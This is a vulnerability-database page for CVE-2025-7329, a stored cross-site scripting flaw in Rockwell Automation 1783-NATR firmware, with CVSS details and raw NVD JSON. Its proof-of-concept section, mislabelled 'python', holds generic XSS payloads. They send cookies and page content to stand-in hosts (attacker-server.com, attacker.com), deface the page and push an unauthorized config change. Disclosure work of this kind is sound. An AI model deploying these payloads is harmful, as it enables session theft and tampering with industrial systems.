Security Vulnerability Report
中文
CVE-2025-7329 CVSS 4.8 MEDIUM

CVE-2025-7329

Published: 2025-10-14 13:15:39
Last Modified: 2025-10-30 21:43:58
Source: [email protected]

Description

A Stored Cross-Site Scripting security issue exists in the affected product that could potentially allow a malicious user to view and modify sensitive data or make the webpage unavailable. The vulnerability stems from missing special character filtering and encoding. Successful exploitation requires an attacker to be able to update configuration fields behind admin login.

CVSS Details

CVSS Score
4.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:* - NOT VULNERABLE
Rockwell Automation 相关产品(具体版本请参考官方安全公告SD1756)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- Stored XSS PoC for CVE-2025-7329 --> <!-- This PoC demonstrates the stored XSS vulnerability in Rockwell Automation product configuration fields --> <!-- Step 1: Attacker (with admin privileges) injects malicious script into a configuration field --> <!-- The payload is stored in the configuration field without proper sanitization --> <script> // Malicious JavaScript payload // Steal session cookies var cookie = document.cookie; // Exfiltrate sensitive data var img = new Image(); img.src = "https://attacker-server.com/steal?cookie=" + encodeURIComponent(cookie) + "&data=" + encodeURIComponent(document.body.innerHTML); // Modify page content document.body.innerHTML = "<h1>Page Modified by Attacker</h1>"; // Perform unauthorized actions via fetch fetch('/api/config/update', { method: 'POST', headers: {'Content-Type': 'application/json'}, body: JSON.stringify({config: 'malicious_value'}) }); </script> <!-- Alternative payloads that bypass basic filters --> <img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)"> <svg onload="alert(document.domain)"> <body onload="eval(atob('base64_encoded_payload'))"> <!-- Step 2: When another admin views the configuration page, the stored script executes automatically --> <!-- The malicious script can: 1. Steal session cookies and authentication tokens 2. Modify sensitive configuration data 3. Make the webpage unavailable (DoS) 4. Perform actions on behalf of the victim user -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7329", "sourceIdentifier": "[email protected]", "published": "2025-10-14T13:15:39.157", "lastModified": "2025-10-30T21:43:57.893", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Stored Cross-Site Scripting security issue exists in the affected product that could potentially allow a malicious user to view and modify sensitive data or make the webpage unavailable. The vulnerability stems from missing special character filtering and encoding. Successful exploitation requires an attacker to be able to update configuration fields behind admin login."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:1783-natr_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.007", "matchCriteriaId": "37063188-4380-47A4-8179-50AACB1D9C4D"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:1783-natr:-:*:*:*:*:*:*:*", "matchCriteriaId": "FEAE0B20-4A7B-4A7F-826E-A986A4CFE08D"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1756.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.